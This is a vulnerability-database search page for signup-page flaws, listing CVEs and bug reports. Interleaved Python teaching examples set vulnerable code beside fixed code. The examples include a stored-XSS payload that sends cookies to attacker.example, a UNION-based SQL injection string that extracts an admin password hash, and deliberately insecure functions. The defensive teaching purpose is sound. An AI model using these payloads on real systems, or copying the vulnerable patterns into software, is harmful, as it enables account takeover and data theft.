1035 matches found

Cvelist
added 2020/12/28 7:55 a.m., 24 views

CVE-2020-29159

An issue was discovered in Zammad before 3.5.1. The default signup Role for newly created Users can be a privileged Role, if configured by an admin. This behavior was unintended...

AI score 5.1, EPSS 0.00918
Exploits 0, References 2
Hacker One
added 2020/12/26 5:34 a.m., 47 views

h1-ctf: Grinch Networks compromised!

Grinch Networks compromised! For fast triage/validation and inspired by @manoelt in other CTF, I made a bash script to find and print all the 12 flags of this CTF. The script uses curl, wget, google-chrome headless for flag 2, unzip, grep and sed. If any of these commands is missing, the script...

AI score 7.8
Exploits 0
Cvelist
added 2020/12/24 3:04 a.m., 17 views

CVE-2020-35676

BigProf Online Invoicing System before 3.1 fails to correctly sanitize an XSS payload when a user registers using the self-registration functionality. As such, an attacker can input a crafted payload that will execute upon the application's administrator browsing the registered users' list. Once...

AI score 6.2, EPSS 0.00749
Exploits 1, References 2
Hacker One
added 2020/12/23 10:47 p.m., 192 views

h1-ctf: h1 hacky holidays CTF solution

Simple script to print all the flags. Full solution to follow; I want to spend more time writing this, but am racing to be in the first 10 submissions: echo "Flag 1 -- robots.txt" curl https://hackyholidays.h1ctf.com/robots.txt 2>/dev/null | grep flag echo "" echo "Flag 2 -- js descrambled --...

AI score 7
Exploits 0
CNNVD
added 2020/12/23 12:00 a.m., 6 views

BigProf Online Invoicing System cross-site scripting vulnerability

BigProf Online Invoicing System OIS is an easy invoicing tool for small businesses, consultants and freelancers created using AppGini. A cross-site scripting vulnerability exists in app/membershipsignup.php and app/admin/pageViewMembers.php in BigProf Online Invoicing System versions prior to 3.1...

CVSS 6.1, AI score 6.3, EPSS 0.00749
Exploits 1, References 3
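The two BigProf entries above describe the same flaw: a value accepted at self-registration (membershipsignup.php) is later written unescaped into the admin's member list (pageViewMembers.php), so the registrant's HTML runs in the administrator's browser. The following is an added example, not BigProf's or AppGini's code, that reproduces that pattern in a few lines of Python: an in-memory member store (constructed), the vulnerable rendering that interpolates stored fields raw, and the fixed rendering that HTML-encodes each field at output time. The payload string is constructed for the demonstration.

```python
import html
from dataclasses import dataclass, field


@dataclass
class MemberStore:
    """Constructed in-memory stand-in for the application's members table
    (assumption: not the real BigProf/AppGini schema)."""
    members: list = field(default_factory=list)

    def signup(self, username: str, full_name: str) -> None:
        # Self-registration stores exactly what the visitor typed.
        self.members.append({"username": username, "full_name": full_name})


def render_members_vulnerable(store: MemberStore) -> str:
    """Admin 'view members' page that interpolates stored fields raw:
    any HTML a registrant supplied is emitted into the admin's page."""
    rows = "".join(
        f"<tr><td>{m['username']}</td><td>{m['full_name']}</td></tr>"
        for m in store.members
    )
    return f"<table>{rows}</table>"


def render_members_fixed(store: MemberStore) -> str:
    """Same page with output encoding: every stored field is HTML-escaped
    at the point it is written into the document, so the browser renders
    the payload as text instead of executing it."""
    rows = "".join(
        "<tr><td>{}</td><td>{}</td></tr>".format(
            html.escape(m["username"], quote=True),
            html.escape(m["full_name"], quote=True),
        )
        for m in store.members
    )
    return f"<table>{rows}</table>"


# Constructed payload: what an attacker types into the self-registration form.
PAYLOAD = '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>'


def demo():
    """Register one benign user and one attacker, then render the admin
    page both ways. Returns (vulnerable_html, fixed_html)."""
    store = MemberStore()
    store.signup("alice", "Alice Example")
    store.signup("mallory", PAYLOAD)
    return render_members_vulnerable(store), render_members_fixed(store)


if __name__ == "__main__":
    vuln, fixed = demo()
    print("vulnerable:", vuln)
    print("fixed:     ", fixed)
```

Encoding at the output sink, rather than trying to "sanitize" on the signup form, is the fix that holds regardless of which later page displays the stored value; input-side filtering only protects the pages the developer remembered to think about.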
Hacker One
added 2020/12/18 3:05 p.m., 24 views

Khan Academy: Access to alerta.khanacademy.org leak sensitive data

Hi, I found a way to access https://alerta.khanacademy.org/ using a signup bypass. That leaks access to sensitive data of khanacademy.org. Steps To Reproduce: 1. Go to https://alerta.khanacademy.org//signup 2. Inspect Q and remove ng-hide F1121291 3. You get the Signup Form. Signup account using...

AI score 1
Exploits 0
OSV
added 2020/09/30 9:15 p.m., 2 views

CVE-2020-12870

RainbowFish PacsOne Server 6.8.4 allows SQL injection on the username parameter in the signup page...

CVSS 9.8, AI score 7.4, EPSS 0.01609
Exploits 1, References 2
NVD
added 2020/09/30 9:15 p.m., 8 views

CVE-2020-12870

RainbowFish PacsOne Server 6.8.4 allows SQL injection on the username parameter in the signup page...

CVSS 9.8, EPSS 0.01609
Exploits 1, References 2
Prion
added 2020/09/30 9:15 p.m., 14 views

SQL injection

RainbowFish PacsOne Server 6.8.4 allows SQL injection on the username parameter in the signup page...

CVSS 7.5, AI score 9.8, EPSS 0.01609
Exploits 1, References 2, Affected Software 1
Cvelist
added 2020/09/30 8:40 p.m., 15 views

CVE-2020-12870

RainbowFish PacsOne Server 6.8.4 allows SQL injection on the username parameter in the signup page...

AI score 9.9, EPSS 0.01609
Exploits 1, References 2
CVE
added 2020/09/30 8:40 p.m., 33 views

CVE-2020-12870

RainbowFish PacsOne Server 6.8.4 is affected by CVE-2020-12870 due to an SQL injection on the username parameter in the signup page. The issue is documented across multiple sources (NVD, Red Hat entry, CVE lists) with CVSS scores indicating high/critical impact (CVSS v2 base 7.5; CVSS v3.1 base 9...

CVSS 9.8, AI score 9.8, EPSS 0.01609
Exploits 1, References 2, Affected Software 1
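The five CVE-2020-12870 entries above all say the same thing: the username submitted to the PacsOne signup page reaches a SQL statement unparameterised. None of them shows the query, so the following added example (not PacsOne's code) assumes the most common shape of that bug, a signup-time "is this username taken?" lookup built by string formatting, and puts it beside the parameterised version. The schema, rows and payload are constructed; SQLite is used only because it ships with Python.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample schema and rows; not PacsOne's real tables."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT UNIQUE, password_hash TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (username, password_hash) VALUES (?, ?)",
        [("admin", "pbkdf2$deadbeef"), ("radiologist", "pbkdf2$cafebabe")],
    )
    conn.commit()
    return conn


def username_taken_vulnerable(conn, username: str) -> list:
    """Signup-time 'is this username already taken?' query built by string
    formatting (assumed shape of the flaw): the submitted value becomes
    part of the SQL text."""
    sql = "SELECT username FROM users WHERE username = '%s'" % username
    return [row[0] for row in conn.execute(sql)]


def username_taken_fixed(conn, username: str) -> list:
    """Same query with a bound parameter: the value travels separately from
    the statement, so quotes and comment markers carry no SQL meaning."""
    sql = "SELECT username FROM users WHERE username = ?"
    return [row[0] for row in conn.execute(sql, (username,))]


# Constructed payload: close the string literal, UNION in the admin's
# password hash, and comment out the trailing quote the template appends.
PAYLOAD = "x' UNION SELECT password_hash FROM users WHERE username = 'admin'--"


def demo() -> tuple:
    """Run the payload through both versions. Returns (vulnerable, fixed)."""
    conn = make_db()
    return (
        username_taken_vulnerable(conn, PAYLOAD),
        username_taken_fixed(conn, PAYLOAD),
    )


if __name__ == "__main__":
    vulnerable, fixed = demo()
    print("vulnerable query returned:", vulnerable)
    print("parameterised query returned:", fixed)
```

With the vulnerable version the "username" that comes back is the admin's password hash; with the bound parameter the same string is simply a username nobody has. The signup page is a particularly bad place for this bug because it is reachable without any credentials, which is why the entries score it at the top of the CVSS range.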
Krebs on Security
added 2020/09/03 1:08 a.m., 33 views

The Joys of Owning an ‘OG’ Email Account

When you own a short email address at a popular email provider, you are bound to get gobs of spam, and more than a few alerts about random people trying to seize control over the account. If your account name is short and desirable enough, this kind of activity can make the account less reliable...

AI score 7.2
Exploits 0
Nextcloud
added 2020/08/03 12:00 a.m., 41 views

Missing rate limit on signup page (NC-SA-2020-033)

A missing rate limit in the Preferred Providers app 1.7.0 allowed an attacker to set the password an uncontrolled amount of times...

CVSS 5, AI score 4.3, EPSS 0.01883
Exploits 1, Affected Software 1
OSV
added 2020/07/30 2:15 p.m., 2 views

CVE-2020-15511

HashiCorp Terraform Enterprise up to v202006-1 contained a default signup page that allowed user registration even when disabled, bypassing SAML enforcement. Fixed in v202007-1...

CVSS 5.3, AI score 5.7, EPSS 0.00852
Exploits 0, References 2
NVD
added 2020/07/30 2:15 p.m., 10 views

CVE-2020-15511

HashiCorp Terraform Enterprise up to v202006-1 contained a default signup page that allowed user registration even when disabled, bypassing SAML enforcement. Fixed in v202007-1...

CVSS 5.3, AI score 5.2, EPSS 0.00852
Exploits 0, References 2
Prion
added 2020/07/30 2:15 p.m., 15 views

Default configuration

HashiCorp Terraform Enterprise up to v202006-1 contained a default signup page that allowed user registration even when disabled, bypassing SAML enforcement. Fixed in v202007-1...

CVSS 5, AI score 5.2, EPSS 0.00852
Exploits 0, References 2, Affected Software 1
Cvelist
added 2020/07/30 1:15 p.m., 21 views

CVE-2020-15511

HashiCorp Terraform Enterprise up to v202006-1 contained a default signup page that allowed user registration even when disabled, bypassing SAML enforcement. Fixed in v202007-1...

AI score 5.2, EPSS 0.00852
Exploits 0, References 2
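Three entries on this page are the same design mistake seen from different angles: the Terraform Enterprise default signup page that still registered users when registration was disabled and SAML was enforced, the Khan Academy report where un-hiding an ng-hide form was enough to reach a working signup, and the Zammad entry where the default role handed to self-registered users could be a privileged one. The added example below, which is not code from any of those projects, shows the server-side gate a signup endpoint needs: the decision is made from configuration on every request, and the default role is checked against the permission table before it is assigned. The config fields, role names and permission names are assumptions made for the example.

```python
from dataclasses import dataclass, field

# Permission names are constructed for the example; the only point is that
# some permissions are administrative and must never be a signup default.
PRIVILEGED_PERMISSIONS = {"admin", "admin.user", "admin.role"}


@dataclass
class AuthConfig:
    self_registration_enabled: bool = False
    sso_enforced: bool = False                 # e.g. "SAML only" mode
    default_signup_roles: tuple = ("Customer",)
    # constructed role -> permission map standing in for the app's RBAC table
    role_permissions: dict = field(default_factory=lambda: {
        "Customer": {"ticket.customer"},
        "Agent": {"ticket.agent"},
        "Admin": {"admin", "admin.user", "admin.role"},
    })


class SignupRejected(Exception):
    """Raised when the server-side policy forbids self-registration."""


def privileged_permissions_of(cfg: AuthConfig, role: str) -> set:
    """Administrative permissions a role would grant (empty set if none)."""
    return cfg.role_permissions.get(role, set()) & PRIVILEGED_PERMISSIONS


def validate_default_signup_roles(cfg: AuthConfig) -> None:
    """Run when the setting is saved and again at signup time: a default
    signup role must not carry administrative permissions."""
    for role in cfg.default_signup_roles:
        bad = privileged_permissions_of(cfg, role)
        if bad:
            raise ValueError(
                f"default signup role {role!r} grants privileged permissions {sorted(bad)}"
            )


def handle_signup(cfg: AuthConfig, email: str) -> dict:
    """Gate for POST /signup. The decision depends only on server-side
    configuration: not linking to the page, or hiding the form in the UI,
    is not a control, because the endpoint is still reachable."""
    if cfg.sso_enforced:
        raise SignupRejected("local signup disabled: SSO is enforced")
    if not cfg.self_registration_enabled:
        raise SignupRejected("self-registration is disabled")
    validate_default_signup_roles(cfg)
    return {"email": email, "roles": list(cfg.default_signup_roles)}


if __name__ == "__main__":
    for cfg in (AuthConfig(), AuthConfig(self_registration_enabled=True)):
        try:
            print(handle_signup(cfg, "new@example.com"))
        except SignupRejected as exc:
            print("rejected:", exc)
```

The check order matters: SSO enforcement is tested first so that enabling local registration by accident cannot reopen a door the identity provider was supposed to own, and the role validation runs at signup as well as at configuration time so a stale or hand-edited setting cannot mint an administrator.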
Hacker One
added 2020/06/22 9:34 p.m., 96 views

Courier: Missing rate limit in signup Form

Hello Team, Description When signing up for an account, you enter your email. When this email is already in use, the server responds with "UserConfirmed":true,"UserSub":"ae294fff-6d55-407d-9676-1f3518029037" This is not a problem, but the fact that you could send this request unlimited times is...

AI score 6.9
Exploits 0
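The Nextcloud advisory (NC-SA-2020-033) and the Courier report above are both "missing rate limit on signup": one lets the password-setting step be repeated without bound, the other lets the email-exists lookup be repeated without bound. Neither entry shows how the endpoint should throttle, so here is an added example, not code from Nextcloud or Courier, of a small sliding-window limiter applied per source IP and per target address in front of a signup handler. The account registry, response bodies and the mail side effects are constructed placeholders; the handler also returns one response body for registered and unregistered addresses, which goes a step beyond what the Courier reporter asked for but closes the enumeration the "UserConfirmed" response would otherwise leak.

```python
import time
from collections import defaultdict, deque


class SlidingWindowLimiter:
    """Allows at most `limit` events per `window` seconds for each key.
    The clock is injectable so the behaviour can be tested without sleeping."""

    def __init__(self, limit: int, window: float, clock=time.monotonic):
        self.limit = limit
        self.window = window
        self.clock = clock
        self._events = defaultdict(deque)

    def allow(self, key) -> bool:
        now = self.clock()
        q = self._events[key]
        while q and now - q[0] >= self.window:  # drop timestamps outside the window
            q.popleft()
        if len(q) >= self.limit:
            return False
        q.append(now)
        return True


# Constructed registry standing in for the application's user store.
EXISTING_ACCOUNTS = {"victim@example.com"}

# One response for every non-throttled outcome, so the endpoint does not
# confirm whether an address is registered.
GENERIC_RESPONSE = {
    "status": 202,
    "body": "If that address is eligible, a confirmation e-mail has been sent.",
}

# Placeholder for the mail side effects (constructed; a real app sends mail here).
SENT_MAIL: list = []


def notify_existing_owner(email: str) -> None:
    SENT_MAIL.append(("already-registered", email))


def create_pending_account(email: str) -> None:
    SENT_MAIL.append(("confirm-signup", email))


def signup_handler(limiter: SlidingWindowLimiter, client_ip: str, email: str) -> dict:
    """POST /signup with two fixes applied:
    1. throttle per source IP and per target address before any lookup;
    2. return the same body whether or not the address already exists."""
    email = email.strip().lower()
    if not limiter.allow(("ip", client_ip)) or not limiter.allow(("email", email)):
        return {"status": 429, "body": "Too many requests; try again later."}
    if email in EXISTING_ACCOUNTS:
        notify_existing_owner(email)      # tell the real owner, not the requester
    else:
        create_pending_account(email)     # normal flow: pending record + confirmation mail
    return dict(GENERIC_RESPONSE)


if __name__ == "__main__":
    limiter = SlidingWindowLimiter(limit=3, window=60)
    for _ in range(5):
        print(signup_handler(limiter, "203.0.113.5", "victim@example.com")["status"])
```

Keying on the target address as well as the source IP is what stops a distributed attacker from hammering one account's password-set or confirmation step from many addresses; keying on the IP alone only slows a single machine down.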
OSV
added 2020/06/19 6:15 p.m., 13 views

CVE-2018-21252

An issue was discovered in Mattermost Server before 5.2, 5.1.1, 5.0.3, and 4.10.3. Attackers could use multiple e-mail addresses to bypass a domain-based policy for signups...

CVSS 4.3, AI score 7.1
Exploits 0, References 1
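The Mattermost entry says only that "multiple e-mail addresses" defeated a domain allowlist on signup, not how the check was written. The added example below, which is not Mattermost's code, shows one hypothetical way such a check fails (trusting whatever follows the last "@") and the strict alternative: validate the submitted field as exactly one address before looking at its domain. The allowlist and sample inputs are constructed.

```python
import re

# Constructed allowlist for the example.
ALLOWED_DOMAINS = {"corp.example"}

# Exactly one local part, one '@' and one dotted domain: no commas,
# whitespace, angle brackets or second '@' anywhere in the string.
STRICT_EMAIL = re.compile(
    r"^[A-Za-z0-9.!#$%&'*+/=?^_`{|}~-]+@"
    r"(?:[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?\.)+[A-Za-z]{2,63}$"
)


def domain_allowed_weak(email: str) -> bool:
    """Hypothetical weak check (not Mattermost's code): trusts whatever
    follows the last '@', so a string carrying several addresses is judged
    by the one the attacker put last."""
    domain = email.rsplit("@", 1)[-1].strip().lower()
    return domain in ALLOWED_DOMAINS


def domain_allowed_strict(email: str) -> bool:
    """Validate the whole string as a single address first, then check the
    one domain it contains."""
    if not STRICT_EMAIL.fullmatch(email):
        return False
    return email.rsplit("@", 1)[1].lower() in ALLOWED_DOMAINS


# Constructed inputs.
LEGIT = "someone@corp.example"
OUTSIDER = "attacker@evil.example"
MULTI = "attacker@evil.example, someone@corp.example"   # two addresses in one field
STACKED = "attacker@evil.example@corp.example"          # second '@' appended


def compare(inputs=(LEGIT, OUTSIDER, MULTI, STACKED)) -> dict:
    """Return {input: (weak_verdict, strict_verdict)} for each sample."""
    return {s: (domain_allowed_weak(s), domain_allowed_strict(s)) for s in inputs}


if __name__ == "__main__":
    for sample, (weak, strict) in compare().items():
        print(f"{sample!r:50} weak={weak} strict={strict}")
```

The general rule this illustrates is that an allowlist must be applied to the parsed, canonical form of the value, and parsing must reject anything that is not exactly one value; whichever address the mail system or the session ends up using, the policy was only ever evaluated against one of them.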
VulnCheck KEV
added 2020/05/14 12:00 a.m., 2 views

VulnCheck KEV: CVE-2020-36715

The Login/Signup Popup plugin for WordPress is vulnerable to authorization bypass due to missing capability checks on several functions in versions up to, and including, 1.4. This makes it possible for authenticated attackers to inject arbitrary web scripts into the plugin settings that execute...

CVSS 7.4, AI score 5.9, EPSS 0.00697
Exploits 1, References 1